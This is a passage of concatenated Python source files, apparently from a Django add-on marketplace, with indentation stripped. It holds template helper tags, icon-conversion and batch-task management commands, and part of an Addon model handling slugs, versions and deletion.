def dependencies_note(context, addon, module_context='impala'):
return new_context(**locals())
@register.inclusion_tag('addons/review_list_box.html')
@jinja2.contextfunction
def review_list_box(context, addon, reviews):
"""Details page: Show a box with three add-on reviews."""
c = dict(context.items())
c.update(addon=addon, reviews=reviews)
return c
@register.inclusion_tag('addons/impala/review_list_box.html')
@jinja2.contextfunction
def impala_review_list_box(context, addon, reviews):
"""Details page: Show a box with three add-on reviews."""
c = dict(context.items())
c.update(addon=addon, reviews=reviews)
return c
@register.inclusion_tag('addons/review_add_box.html')
@jinja2.contextfunction
def review_add_box(context, addon):
"""Details page: Show a box for the user to post a review."""
c = dict(context.items())
c['addon'] = addon
return c
@register.inclusion_tag('addons/impala/review_add_box.html')
@jinja2.contextfunction
def impala_review_add_box(context, addon):
"""Details page: Show a box for the user to post a review."""
c = dict(context.items())
c['addon'] = addon
return c
@register.inclusion_tag('addons/tags_box.html')
@jinja2.contextfunction
def tags_box(context, addon, tags=None):
"""
Details page: Show a box with existing tags along with a form to add new
ones.
"""
c = dict(context.items())
c.update({'addon': addon,
'tags': tags})
return c
@register.inclusion_tag('addons/listing/items.html')
@jinja2.contextfunction
def addon_listing_items(context, addons, show_date=False,
show_downloads=False, src=None, notes={}):
return new_context(**locals())
@register.inclusion_tag('addons/impala/listing/items.html')
@jinja2.contextfunction
def impala_addon_listing_items(context, addons, field=None, src=None,
dl_src=None, notes={}):
if not src:
src = context.get('src')
if not dl_src:
dl_src = context.get('dl_src', src)
return new_context(**locals())
@register.inclusion_tag('addons/listing/items_compact.html')
@jinja2.contextfunction
def addon_listing_items_compact(context, addons, show_date=False, src=None):
return new_context(**locals())
@register.inclusion_tag('addons/listing/items_mobile.html')
@jinja2.contextfunction
def addon_listing_items_mobile(context, addons, sort=None, src=None):
return new_context(**locals())
@register.inclusion_tag('addons/listing_header.html')
@jinja2.contextfunction
def addon_listing_header(context, url_base, sort_opts, selected):
return new_context(**locals())
@register.inclusion_tag('addons/impala/listing/sorter.html')
@jinja2.contextfunction
def impala_addon_listing_header(context, url_base, sort_opts={}, selected=None,
extra_sort_opts={}, search_filter=None):
if search_filter:
selected = search_filter.field
sort_opts = search_filter.opts
if hasattr(search_filter, 'extras'):
extra_sort_opts = search_filter.extras
# When an "extra" sort option becomes selected, it will appear alongside
# the normal sort options.
old_extras = extra_sort_opts
sort_opts, extra_sort_opts = list(sort_opts), []
for k, v in old_extras:
if k == selected:
sort_opts.append((k, v, True))
else:
extra_sort_opts.append((k, v))
return new_context(**locals())
@register.filter
@jinja2.contextfilter
@register.inclusion_tag('addons/impala/sidebar_listing.html')
def sidebar_listing(context, addon):
return new_context(**locals())
@register.filter
@jinja2.contextfilter
@register.inclusion_tag('addons/impala/addon_hovercard.html')
def addon_hovercard(context, addon, lazyload=False, src=None, dl_src=None):
if not src:
src = context.get('src')
if not dl_src:
dl_src = context.get('dl_src', src)
vital_summary = context.get('vital_summary') or 'rating'
vital_more_default = 'downloads' if addon.is_webapp() else 'adu'
vital_more = context.get('vital_more')
if 'vital_more' not in context:
vital_more = vital_more_default
return new_context(**locals())
@register.filter
@jinja2.contextfilter
@register.inclusion_tag('addons/impala/addon_grid.html')
def addon_grid(context, addons, src=None, dl_src=None, pagesize=6, cols=2,
vital_summary='rating', vital_more='adu'):
if not src:
src = context.get('src')
# dl_src is an optional src parameter just for the download links
if not dl_src:
dl_src = context.get('dl_src', src)
pages = chunked(addons, pagesize)
columns = 'cols-%d' % cols
return new_context(**locals())
@register.filter
@jinja2.contextfilter
@register.inclusion_tag('addons/impala/featured_grid.html')
def featured_grid(context, addons, src=None, dl_src=None, pagesize=3, cols=3):
if not src:
src = context.get('src')
# dl_src is an optional src paramater just for the download links
if not dl_src:
dl_src = src
pages = chunked(addons, pagesize)
columns = '' if cols != 3 else 'three-col'
return new_context(**locals())
@register.filter
@jinja2.contextfilter
@register.inclusion_tag('addons/impala/toplist.html')
def addon_toplist(context, addons, vital='users', src=None):
return new_context(**locals())
def new_context(context, **kw):
c = dict(context.items())
c.update(kw)
return c
@register.inclusion_tag('addons/report_abuse.html')
@jinja2.contextfunction
def addon_report_abuse(context, hide, addon):
return new_context(**locals())
########NEW FILE########
__FILENAME__ = convert_icons
import os
import stat
from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand
from django.core.files.storage import default_storage as storage
from addons.models import Addon
import amo
from amo.decorators import write
from amo.storage_utils import walk_storage
from amo.utils import resize_image, chunked
extensions = ['.png', '.jpg', '.gif']
sizes = amo.ADDON_ICON_SIZES
size_suffixes = ['-%s' % s for s in sizes]
@write
def convert(directory, delete=False):
print 'Converting icons in %s' % directory
pks = []
k = 0
for path, names, filenames in walk_storage(directory):
for filename in filenames:
old = os.path.join(path, filename)
pre, ext = os.path.splitext(old)
if (pre[-3:] in size_suffixes or ext not in extensions):
continue
if not storage.size(old):
print 'Icon %s is empty, ignoring.' % old
continue
for size, size_suffix in zip(sizes, size_suffixes):
new = '%s%s%s' % (pre, size_suffix, '.png')
if os.path.exists(new):
continue
resize_image(old, new, (size, size), remove_src=False)
if ext != '.png':
pks.append(os.path.basename(pre))
if delete:
storage.delete(old)
k += 1
if not k % 1000:
print "... converted %s" % k
for chunk in chunked(pks, 100):
Addon.objects.filter(pk__in=chunk).update(icon_type='image/png')
class Command(BaseCommand):
help = 'Process icons to -32, -48, -64 and optionally delete'
option_list = BaseCommand.option_list + (
make_option('--delete', action='store_true',
dest='delete', help='Deletes the old icons.'),
)
def handle(self, *args, **options):
start_dir = settings.ADDON_ICONS_PATH
convert(start_dir, delete=options.get('delete'))
########NEW FILE########
__FILENAME__ = process_addons
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from django.db.models import Q
from celery import chord, group
import amo
from addons.models import Addon
from amo.utils import chunked
from mkt.webapps.tasks import (add_uuids, clean_apps, dump_apps,
fix_missing_icons, import_manifests,
regenerate_icons_and_thumbnails,
update_manifests, update_supported_locales,
zip_apps)
tasks = {
'update_manifests': {'method': update_manifests,
'qs': [Q(type=amo.ADDON_WEBAPP, is_packaged=False,
status__in=[amo.STATUS_PENDING,
amo.STATUS_PUBLIC,
amo.STATUS_PUBLIC_WAITING],
disabled_by_user=False)]},
'add_uuids': {'method': add_uuids,
'qs': [Q(type=amo.ADDON_WEBAPP, guid=None),
~Q(status=amo.STATUS_DELETED)]},
'update_supported_locales': {
'method': update_supported_locales,
'qs': [Q(type=amo.ADDON_WEBAPP, disabled_by_user=False,
status__in=[amo.STATUS_PENDING, amo.STATUS_PUBLIC,
amo.STATUS_PUBLIC_WAITING])]},
'dump_apps': {'method': dump_apps,
'qs': [Q(type=amo.ADDON_WEBAPP, status=amo.STATUS_PUBLIC,
disabled_by_user=False)],
'pre': clean_apps,
'post': zip_apps},
'fix_missing_icons': {'method': fix_missing_icons,
'qs': [Q(type=amo.ADDON_WEBAPP,
status__in=[amo.STATUS_PENDING,
amo.STATUS_PUBLIC,
amo.STATUS_PUBLIC_WAITING],
disabled_by_user=False)]},
'regenerate_icons_and_thumbnails':
{'method': regenerate_icons_and_thumbnails,
'qs': [Q(type=amo.ADDON_WEBAPP,
status__in=[amo.STATUS_PENDING,
amo.STATUS_PUBLIC,
amo.STATUS_PUBLIC_WAITING],
disabled_by_user=False)]},
'import_manifests': {'method': import_manifests,
'qs': [Q(type=amo.ADDON_WEBAPP,
disabled_by_user=False)]},
}
class Command(BaseCommand):
"""
A generic command to run a task on addons.
Add tasks to the tasks dictionary, providing a list of Q objects if you'd
like to filter the list down.
method: the method to delay
pre: a method to further pre process the pks, must return the pks (opt.)
qs: a list of Q objects to apply to the method
kwargs: any extra kwargs you want to apply to the delay method (optional)
"""
option_list = BaseCommand.option_list + (
make_option('--task', action='store', type='string',
dest='task', help='Run task on the addons.'),
)
def handle(self, *args, **options):
task = tasks.get(options.get('task'))
if not task:
raise CommandError('Unknown task provided. Options are: %s'
% ', '.join(tasks.keys()))
pks = (Addon.objects.filter(*task['qs'])
.values_list('pk', flat=True)
.order_by('-last_updated'))
if 'pre' in task:
# This is run in process to ensure its run before the tasks.
pks = task['pre'](pks)
if pks:
kw = task.get('kwargs', {})
# All the remaining tasks go in one group.
grouping = []
for chunk in chunked(pks, 100):
grouping.append(
task['method'].subtask(args=[chunk], kwargs=kw))
# Add the post task on to the end.
post = None
if 'post' in task:
post = task['post'].subtask(args=[], kwargs=kw, immutable=True)
ts = chord(grouping, post)
else:
ts = group(grouping)
ts.apply_async()
########NEW FILE########
__FILENAME__ = models
# -*- coding: utf-8 -*-
import itertools
import os
import re
import time
from datetime import datetime, timedelta
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.db import models, transaction
from django.db.models import signals as dbsignals
from django.db.models import Max, Q
from django.dispatch import receiver
from django.utils.translation import trans_real as translation
import caching.base as caching
import commonware.log
import json_field
from jinja2.filters import do_dictsort
from tower import ugettext_lazy as _
import amo
import amo.models
from access import acl
from addons import query, signals
from addons.utils import get_featured_ids
from amo.decorators import use_master, write
from amo.fields import DecimalCharField
from amo.helpers import absolutify
from amo.urlresolvers import get_outgoing_url, reverse
from amo.utils import (attach_trans_dict, find_language, send_mail, slugify,
sorted_groupby, timer, to_language, urlparams)
from files.models import File
from reviews.models import Review
from tags.models import Tag
from translations.fields import (LinkifiedField, PurifiedField, save_signal,
TranslatedField, Translation)
from translations.query import order_by_translation
from users.models import UserForeignKey, UserProfile
from versions.compare import version_int
from versions.models import Version
from mkt.prices.models import AddonPremium, Price
log = commonware.log.getLogger('z.addons')
def clean_slug(instance, slug_field='slug'):
"""Cleans a model instance slug.
This strives to be as generic as possible as it's used by Addons, Webapps
and maybe less in the future. :-D
"""
slug = getattr(instance, slug_field, None) or instance.name
if not slug:
# Initialize the slug with what we have available: a name translation,
# or the id of the instance, or in last resort the model name.
translations = Translation.objects.filter(id=instance.name_id)
if translations.exists():
slug = translations[0]
elif instance.id:
slug = str(instance.id)
else:
slug = instance.__class__.__name__
max_length = instance._meta.get_field_by_name(slug_field)[0].max_length
slug = slugify(slug)[:max_length]
if BlacklistedSlug.blocked(slug):
slug = slug[:max_length - 1] + '~'
# The following trick makes sure we are using a manager that returns
# all the objects, as otherwise we could have a slug clash on our hands.
# Eg with the "Addon.objects" manager, which doesn't list deleted addons,
# we could have a "clean" slug which is in fact already assigned to an
# already existing (deleted) addon.
# Also, make sure we use the base class (eg Webapp, which inherits from
# Addon, shouldn't clash with addons). This is extra paranoid, as webapps
# have a different slug field, but just in case we need this in the future.
manager = models.Manager()
manager.model = instance._meta.proxy_for_model or instance.__class__
qs = manager.values_list(slug_field, flat=True) # Get list of all slugs.
if instance.id:
qs = qs.exclude(pk=instance.id) # Can't clash with itself.
# We first need to make sure there's a clash, before trying to find a
# suffix that is available. Eg, if there's a "foo-bar" slug, "foo" is still
# available.
clash = qs.filter(**{slug_field: slug})
if clash.exists():
# Leave space for "-" and 99 clashes.
slug = slugify(slug)[:max_length - 3]
# There is a clash, so find a suffix that will make this slug unique.
prefix = '%s-' % slug
lookup = {'%s__startswith' % slug_field: prefix}
clashes = qs.filter(**lookup)
# Try numbers between 1 and the number of clashes + 1 (+ 1 because we
# start the range at 1, not 0):
# if we have two clashes "foo-1" and "foo-2", we need to try "foo-x"
# for x between 1 and 3 to be absolutely sure to find an available one.
for idx in range(1, len(clashes) + 2):
new = ('%s%s' % (prefix, idx))[:max_length]
if new not in clashes:
slug = new
break
else:
# This could happen. The current implementation (using
# ``[:max_length -3]``) only works for the first 100 clashes in the
# worst case (if the slug is equal to or longuer than
# ``max_length - 3`` chars).
# After that, {verylongslug}-100 will be trimmed down to
# {verylongslug}-10, which is already assigned, but it's the last
# solution tested.
raise RuntimeError
setattr(instance, slug_field, slug)
return instance
class AddonManager(amo.models.ManagerBase):
def __init__(self, include_deleted=False):
amo.models.ManagerBase.__init__(self)
self.include_deleted = include_deleted
def get_query_set(self):
qs = super(AddonManager, self).get_query_set()
qs = qs._clone(klass=query.IndexQuerySet)
if not self.include_deleted:
qs = qs.exclude(status=amo.STATUS_DELETED)
return qs.transform(Addon.transformer)
def id_or_slug(self, val):
if isinstance(val, basestring) and not val.isdigit():
return self.filter(slug=val)
return self.filter(id=val)
def enabled(self):
return self.filter(disabled_by_user=False)
def public(self):
"""Get public add-ons only"""
return self.filter(self.valid_q([amo.STATUS_PUBLIC]))
def reviewed(self):
"""Get add-ons with a reviewed status"""
return self.filter(self.valid_q(amo.REVIEWED_STATUSES))
def unreviewed(self):
"""Get only unreviewed add-ons"""
return self.filter(self.valid_q(amo.UNREVIEWED_STATUSES))
def valid(self):
"""Get valid, enabled add-ons only"""
return self.filter(self.valid_q(amo.LISTED_STATUSES))
def valid_and_disabled(self):
"""
Get valid, enabled and disabled add-ons.
"""
statuses = list(amo.LISTED_STATUSES) + [amo.STATUS_DISABLED]
return (self.filter(Q(status__in=statuses) | Q(disabled_by_user=True))
.exclude(_current_version__isnull=True))
def featured(self, app, lang=None, type=None):
"""
Filter for all featured add-ons for an application in all locales.
"""
ids = get_featured_ids(app, lang, type)
return amo.models.manual_order(self.listed(app), ids, 'addons.id')
def listed(self, app, *status):
"""
Listed add-ons have a version with a file matching ``status`` and are
not disabled. Self-hosted add-ons will be returned too.
"""
if len(status) == 0:
status = [amo.STATUS_PUBLIC]
return self.filter(self.valid_q(status), appsupport__app=app.id)
def top_free(self, app, listed=True):
qs = (self.listed(app) if listed else
self.filter(appsupport__app=app.id))
return (qs.exclude(premium_type__in=amo.ADDON_PREMIUMS)
.exclude(addonpremium__price__price__isnull=False)
.order_by('-weekly_downloads')
.with_index(addons='downloads_type_idx'))
def top_paid(self, app, listed=True):
qs = (self.listed(app) if listed else
self.filter(appsupport__app=app.id))
return (qs.filter(premium_type__in=amo.ADDON_PREMIUMS,
addonpremium__price__price__isnull=False)
.order_by('-weekly_downloads')
.with_index(addons='downloads_type_idx'))
def valid_q(self, status=[], prefix=''):
"""
Return a Q object that selects a valid Addon with the given statuses.
An add-on is valid if not disabled and has a current version.
``prefix`` can be used if you're not working with Addon directly and
need to hop across a join, e.g. ``prefix='addon__'`` in
CollectionAddon.
"""
if not status:
status = [amo.STATUS_PUBLIC]
def q(*args, **kw):
if prefix:
kw = dict((prefix + k, v) for k, v in kw.items())
return Q(*args, **kw)
return q(q(_current_version__isnull=False),
disabled_by_user=False, status__in=status)
class Addon(amo.models.OnChangeMixin, amo.models.ModelBase):
STATUS_CHOICES = amo.STATUS_CHOICES.items()
LOCALES = [(translation.to_locale(k).replace('_', '-'), v) for k, v in
do_dictsort(settings.LANGUAGES)]
guid = models.CharField(max_length=255, unique=True, null=True)
slug = models.CharField(max_length=30, unique=True, null=True)
# This column is only used for webapps, so they can have a slug namespace
# separate from addons and personas.
app_slug = models.CharField(max_length=30, unique=True, null=True,
blank=True)
name = TranslatedField(default=None)
default_locale = models.CharField(max_length=10,
default=settings.LANGUAGE_CODE,
db_column='defaultlocale')
type = models.PositiveIntegerField(db_column='addontype_id', default=0)
status = models.PositiveIntegerField(
choices=STATUS_CHOICES, db_index=True, default=0)
highest_status = models.PositiveIntegerField(
choices=STATUS_CHOICES, default=0,
help_text='An upper limit for what an author can change.',
db_column='higheststatus')
icon_type = models.CharField(max_length=25, blank=True,
db_column='icontype')
icon_hash = models.CharField(max_length=8, blank=True, null=True)
homepage = TranslatedField()
support_email = TranslatedField(db_column='supportemail')
support_url = TranslatedField(db_column='supporturl')
description = PurifiedField(short=False)
summary = LinkifiedField()
developer_comments = PurifiedField(db_column='developercomments')
eula = PurifiedField()
privacy_policy = PurifiedField(db_column='privacypolicy')
the_reason = PurifiedField()
the_future = PurifiedField()
average_rating = models.FloatField(max_length=255, default=0, null=True,
db_column='averagerating')
bayesian_rating = models.FloatField(default=0, db_index=True,
db_column='bayesianrating')
total_reviews = models.PositiveIntegerField(default=0,
db_column='totalreviews')
weekly_downloads = models.PositiveIntegerField(
default=0, db_column='weeklydownloads', db_index=True)
total_downloads = models.PositiveIntegerField(
default=0, db_column='totaldownloads')
hotness = models.FloatField(default=0, db_index=True)
average_daily_downloads = models.PositiveIntegerField(default=0)
average_daily_users = models.PositiveIntegerField(default=0)
share_count = models.PositiveIntegerField(default=0, db_index=True,
db_column='sharecount')
last_updated = models.DateTimeField(
db_index=True, null=True,
help_text='Last time this add-on had a file/version update')
ts_slowness = models.FloatField(
db_index=True, null=True,
help_text='How much slower this add-on makes browser ts tests. '
'Read as {addon.ts_slowness}% slower.')
disabled_by_user = models.BooleanField(default=False, db_index=True,
db_column='inactive')
trusted = models.BooleanField(default=False)
view_source = models.BooleanField(default=True, db_column='viewsource')
public_stats = models.BooleanField(default=False, db_column='publicstats')
prerelease = models.BooleanField(default=False)
admin_review = models.BooleanField(default=False, db_column='adminreview')
admin_review_type = models.PositiveIntegerField(
choices=amo.ADMIN_REVIEW_TYPES.items(), default=amo.ADMIN_REVIEW_FULL)
site_specific = models.BooleanField(default=False,
db_column='sitespecific')
external_software = models.BooleanField(default=False,
db_column='externalsoftware')
dev_agreement = models.BooleanField(
default=False, help_text='Has the dev agreement been signed?')
auto_repackage = models.BooleanField(
default=True, help_text='Automatically upgrade jetpack add-on to a '
'new sdk version?')
outstanding = models.BooleanField(default=False)
nomination_message = models.TextField(null=True,
db_column='nominationmessage')
target_locale = models.CharField(
max_length=255, db_index=True, blank=True, null=True,
help_text='For dictionaries and language packs')
locale_disambiguation = models.CharField(
max_length=255, blank=True, null=True,
help_text='For dictionaries and language packs')
wants_contributions = models.BooleanField(default=False)
paypal_id = models.CharField(max_length=255, blank=True)
charity = models.ForeignKey('Charity', null=True)
# TODO(jbalogh): remove nullify_invalid once remora dies.
suggested_amount = DecimalCharField(
max_digits=8, decimal_places=2, nullify_invalid=True, blank=True,
null=True, help_text=_(u'Users have the option of contributing more '
u'or less than this amount.'))
total_contributions = DecimalCharField(max_digits=8, decimal_places=2,
nullify_invalid=True, blank=True,
null=True)
annoying = models.PositiveIntegerField(
choices=amo.CONTRIB_CHOICES, default=0,
help_text=_(u'Users will always be asked in the Add-ons'
u' Manager (Firefox 4 and above)'))
enable_thankyou = models.BooleanField(
default=False, help_text='Should the thank you note be sent to '
'contributors?')
thankyou_note = TranslatedField()
authors = models.ManyToManyField('users.UserProfile', through='AddonUser',
related_name='addons')
categories = models.ManyToManyField('Category', through='AddonCategory')
premium_type = models.PositiveIntegerField(
choices=amo.ADDON_PREMIUM_TYPES.items(), default=amo.ADDON_FREE)
manifest_url = models.URLField(max_length=255, blank=True, null=True)
app_domain = models.CharField(max_length=255, blank=True, null=True,
db_index=True)
_current_version = models.ForeignKey(Version, db_column='current_version',
related_name='+', null=True,
on_delete=models.SET_NULL)
# This is for Firefox only.
_backup_version = models.ForeignKey(
Version, related_name='___backup', db_column='backup_version',
null=True, on_delete=models.SET_NULL)
_latest_version = models.ForeignKey(Version, db_column='latest_version',
on_delete=models.SET_NULL,
null=True, related_name='+')
make_public = models.DateTimeField(null=True)
mozilla_contact = models.EmailField(blank=True)
vip_app = models.BooleanField(default=False)
priority_review = models.BooleanField(default=False)
# Whether the app is packaged or not (aka hosted).
is_packaged = models.BooleanField(default=False, db_index=True)
enable_new_regions = models.BooleanField(default=False, db_index=True)
# Annotates disabled apps from the Great IARC purge for auto-reapprove.
# Note: for currently PUBLIC apps only.
iarc_purged = models.BooleanField(default=False)
# This is the public_id to a Generic Solitude Product
solitude_public_id = models.CharField(max_length=255, null=True, blank=True)
objects = AddonManager()
with_deleted = AddonManager(include_deleted=True)
class Meta:
db_table = 'addons'
@staticmethod
def __new__(cls, *args, **kw):
# Return a Webapp instead of an Addon if the `type` column says this is
# really a webapp.
try:
type_idx = Addon._meta._type_idx
except AttributeError:
type_idx = (idx for idx, f in enumerate(Addon._meta.fields)
if f.attname == 'type').next()
Addon._meta._type_idx = type_idx
if ((len(args) == len(Addon._meta.fields) and
args[type_idx] == amo.ADDON_WEBAPP) or kw and
kw.get('type') == amo.ADDON_WEBAPP):
cls = Webapp
return object.__new__(cls)
def __unicode__(self):
return u'%s: %s' % (self.id, self.name)
def __init__(self, *args, **kw):
super(Addon, self).__init__(*args, **kw)
self._first_category = {}
def save(self, **kw):
self.clean_slug()
super(Addon, self).save(**kw)
@use_master
def clean_slug(self, slug_field='slug'):
if self.status == amo.STATUS_DELETED:
return
clean_slug(self, slug_field)
@transaction.commit_on_success
def delete(self, msg='', reason=''):
# To avoid a circular import.
from . import tasks
# Check for soft deletion path. Happens only if the addon status isn't
# 0 (STATUS_INCOMPLETE), or when we are in Marketplace.
if self.status == amo.STATUS_DELETED:
# We're already done.
return
id = self.id
# Tell IARC this app is delisted from the set_iarc_storefront_data.
if self.type == amo.ADDON_WEBAPP:
self.set_iarc_storefront_data(disable=True)
# Fetch previews before deleting the addon instance, so that we can
# pass the list of files to delete to the delete_preview_files task
# after the addon is deleted.
previews = list(Preview.objects.filter(addon__id=id)
.values_list('id', flat=True))
log.debug('Deleting add-on: %s' % self.id)
to = [settings.FLIGTAR]
user = amo.get_user()
context = {
'atype': amo.ADDON_TYPE.get(self.type).upper(),
'authors': [u.email for u in self.authors.all()],
'adu': self.average_daily_users,
'guid': self.guid,
'id': self.id,
'msg': msg,
'reason': reason,
'name': self.name,
'slug': self.slug,
'total_downloads': self.total_downloads,
'url': absolutify(self.get_url_path()),
'user_str': ("%s, %s (%s)" % (user.display_name or
user.username, user.email,
user.id) if user else "Unknown"),
}
email_msg = u"""
The following %(atype)s was deleted.
%(atype)s: %(name)s
URL: %(url)s
DELETED BY: %(user_str)s
ID: %(id)s
GUID: %(guid)s
AUTHORS: %(authors)s
TOTAL DOWNLOADS: %(total_downloads)s
AVERAGE DAILY USERS: %(adu)s
NOTES: %(msg)s
REASON GIVEN BY USER FOR DELETION: %(reason)s
""" % context
log.debug('Sending delete email for %(atype)s %(id)s' % context)
subject = 'Deleting %(atype)s %(slug)s (%(id)d)' % context
# Update or NULL out various fields.
models.signals.pre_delete.send(sender=Addon, instance=self)
self.update(status=amo.STATUS_DELETED,
slug=None, app_slug=None, app_domain=None,
_current_version=None)
models.signals.post_delete.send(sender=Addon, instance=self)
send_mail(subject, email_msg, recipient_list=to)
for preview in previews:
tasks.delete_preview_files.delay(preview)
return True
@classmethod
def from_upload(cls, upload, platforms, is_packaged=False):
from files.utils import parse_addon
data = parse_addon(upload)
fields = cls._meta.get_all_field_names()
addon = Addon(**dict((k, v) for k, v in data.items() if k in fields))
addon.status = amo.STATUS_NULL
locale_is_set = (addon.default_locale and
addon.default_locale in (
settings.AMO_LANGUAGES +
settings.HIDDEN_LANGUAGES) and
data.get('default_locale') == addon.default_locale)
if not locale_is_set:
addon.default_locale = to_language(translation.get_language())
if addon.is_webapp():
addon.is_packaged = is_packaged
if is_packaged:
addon.app_domain = data.get('origin')
else:
addon.manifest_url = upload.name
addon.app_domain = addon.domain_from_url(addon.manifest_url)
addon.save()
Version.from_upload(upload, addon, platforms)
amo.log(amo.LOG.CREATE_ADDON, addon)
log.debug('New addon %r from %r' % (addon, upload))
return addon
def flush_urls(self):
urls = ['*/addon/%s/' % self.slug, # Doesn't take care of api
'*/addon/%s/developers/' % self.slug,
'*/addon/%s/eula/*' % self.slug,
'*/addon/%s/privacy/' % self.slug,
'*/addon/%s/versions/*' % self.slug,
'*/api/*/addon/%s' % self.slug,
self.icon_url,
self.thumbnail_url,
]
urls.extend('*/user/%d/' % u.id for u in self.listed_authors)
return urls
def get_url_path(self, more=False, add_prefix=True):
# If more=True you get the link to the ajax'd middle chunk of the
# detail page.
view = 'addons.detail_more' if more else 'addons.detail'
return reverse(view, args=[self.slug], add_prefix=add_prefix)
def get_api_url(self):
# Used by Piston in output.
return absolutify(self.get_url_path())
def get_dev_url(self, action='edit', args=None, prefix_only=False):
# Either link to the "new" Marketplace Developer Hub or the old one.
args = args or []
prefix = 'mkt.developers'
if self.is_webapp():
view_name = '%s.%s' if prefix_only else '%s.apps.%s'
return reverse(view_name % (prefix, action),
args=[self.app_slug] + args)
else:
type_ = 'addons'
if not prefix_only:
prefix += '.%s' % type_
view_name = '{prefix}.{action}'.format(prefix=prefix,
action=action)
return reverse(view_name, args=[self.slug] + args)
def get_detail_url(self, action='detail', args=[]):
if self.is_webapp():
return reverse('apps.%s' % action, args=[self.app_slug] + args)
else:
return reverse('addons.%s' % action, args=[self.slug] + args)
def meet_the_dev_url(self):
return reverse('addons.meet', args=[self.slug])
def type_url(self):
"""The url for this add-on's AddonType."""
return AddonType(self.type).get_url_path()
@amo.cached_property(writable=True)
def listed_authors(self):
return UserProfile.objects.filter(
addons=self,
addonuser__listed=True).order_by('addonuser__position')
@classmethod
def get_fallback(cls):
return cls._meta.get_field('default_locale')
@property
def reviews(self):
return Review.objects.filter(addon=self, reply_to=None)
def get_category(self, app):
if app in getattr(self, '_first_category', {}):
return self._first_category[app]
categories = list(self.categories.filter(application=app))
return categories[0] if categories else None
def language_ascii(self):
lang = translation.to_language(self.default_locale)
return settings.LANGUAGES.get(lang)
@property
def valid_file_statuses(self):
if self.status == amo.STATUS_PUBLIC:
return [amo.STATUS_PUBLIC]
if self.status == amo.STATUS_PUBLIC_WAITING:
# For public_waiting apps, accept both public and
# public_waiting statuses, because the file status might be
# changed from PUBLIC_WAITING to PUBLIC just before the app's
# is.
return amo.WEBAPPS_APPROVED_STATUSES
if self.status in (amo.STATUS_LITE,
amo.STATUS_LITE_AND_NOMINATED):
return [amo.STATUS_PUBLIC, amo.STATUS_LITE,
amo.STATUS_LITE_AND_NOMINATED]
return amo.VALID_STATUSES
def get_version(self, backup_version=False):
"""
Retrieves the latest public version of an addon.
backup_version: if specified the highest file up to but *not* including
this version will be found.
"""
try:
status = self.valid_file_statuses
status_list = ','.join(map(str, status))
fltr = {'files__status__in': status}
if backup_version:
fltr['apps__application__id'] = amo.FIREFOX.id
fltr['apps__min__version_int__lt'] = amo.FIREFOX.backup_version
return self.versions.no_cache().filter(**fltr).extra(
where=["""
NOT EXISTS (
SELECT 1 FROM versions as v2
INNER JOIN files AS f2 ON (f2.version_id = v2.id)
WHERE v2.id = versions.id
AND f2.status NOT IN (%s))
""" % status_list])[0]
except (IndexError, Version.DoesNotExist):
return None
@write
def update_version(self, ignore=None, _signal=True):
"""
Returns true if we updated the field.
The optional ``ignore`` parameter, if present, is a a version
to not consider as part of the update, since it may be in the
process of being deleted.
Pass ``_signal=False`` if you want to no signals fired at all.
"""
backup = None
current = self.get_version()
if current:
firefox_min = current.compatible_apps.get(amo.FIREFOX)
if (firefox_min and
firefox_min.min.version_int > amo.FIREFOX.backup_version):
backup = self.get_version(backup_version=True)
try:
latest_qs = self.versions.exclude(files__status=amo.STATUS_BETA)
if ignore is not None:
latest_qs = latest_qs.exclude(pk=ignore.pk)
latest = latest_qs.latest()
except Version.DoesNotExist:
latest = None
latest_id = latest and latest.id
diff = [self._backup_version, backup, self._current_version, current]
# Sometimes the DB is in an inconsistent state when this
# signal is dispatched.
try:
if self._latest_version:
# Make sure stringifying this does not trigger
# Version.DoesNotExist before trying to use it for
# logging.
unicode(self._latest_version)
diff += [self._latest_version, latest]
except Version.DoesNotExist:
diff += [self._latest_version_id, latest_id]
updated = {}
send_signal = False
if self._backup_version != backup:
updated.update({'_backup_version': backup})
send_signal = True
if self._current_version != current:
updated.update({'_current_version': current})
send_signal = True
# Don't use self.latest_version here. It may throw Version.DoesNotExist
# if we're called from a post_delete signal. We also don't set
# send_signal since we only want this fired if the public version
# changes.
if self._latest_version_id != latest_id:
updated.update({'_latest_version': latest})
# update_version can be called by a post_delete signal (such
# as File's) when deleting a version. If so, we should avoid putting
# that version-being-deleted in any fields.
if ignore is not None:
updated = dict([(k, v)
for (k, v) in updated.iteritems() if v != ignore])
if updated:
# Pass along _signal to the .update() to prevent it from firing
# signals if we don't want them.
updated['_signal'] = _signal
try:
self.update(**updated)
if send_signal and _signal:
signals.version_changed.send(sender=self)
log.info(u'Version changed from backup: %s to %s, '
u'current: %s to %s, latest: %s to %s for addon %s'
% tuple(diff + [self]))
except Exception, e:
log.error(u'Could not save version changes backup: %s to %s, '
u'current: %s to %s, latest: %s to %s '
u'for addon %s (%s)'
% tuple(diff + [self, e]))
return bool(updated)
@property
def current_version(self):
"""Returns the current_version or None if the app is deleted or not
created yet"""
if not self.id or self.status == amo.STATUS_DELETED:
return None
try:
return self._current_version
except ObjectDoesNotExist:
pass
return None
@property
def latest_version(self):
"""Returns the latest_version or None if the app is deleted or not
created yet"""
if not self.id or self.status == amo.STATUS_DELETED:
return None
try:
return self._latest_version
except ObjectDoesNotExist:
pass
return None
@property
def backup_version(self):
"""Returns the backup version."""
if not self.current_version:
return
return self._backup_version
def get_icon_dir(self):
return os.path.join(settings.ADDON_ICONS_PATH,
'%s' % (self.id / 1000))
def get_icon_url(self, size, use_default=True):
"""
Returns either the addon's icon url.
If there is no icon for the addon then if:
use_default is True, will return a default icon
use_default is False, will return None
"""
icon_type_split = []
if self.icon_type:
icon_type_split = self.icon_type.split('/')
# Get the closest allowed size without going over
if (size not in amo.ADDON_ICON_SIZES
and size >= amo.ADDON_ICON_SIZES[0]):
size = [s for s in amo.ADDON_ICON_SIZES if s < size][-1]
elif size < amo.ADDON_ICON_SIZES[0]:
size = amo.ADDON_ICON_SIZES[0]
# Figure out what to return for an image URL
if not self.icon_type:
if not use_default:
return None
return '%s/%s-%s.png' % (settings.ADDON_ICONS_DEFAULT_URL,
'default', size)
elif icon_type_split[0] == 'icon':
return '%s/%s-%s.png' % (settings.ADDON_ICONS_DEFAULT_URL,
icon_type_split[1], size)
else:
# [1] is the whole ID, [2] is the directory
split_id = re.match(r'((\d*?)\d{1,3})$', str(self.id))
# If we don't have the icon_hash, and we are dealing with a Webapp,
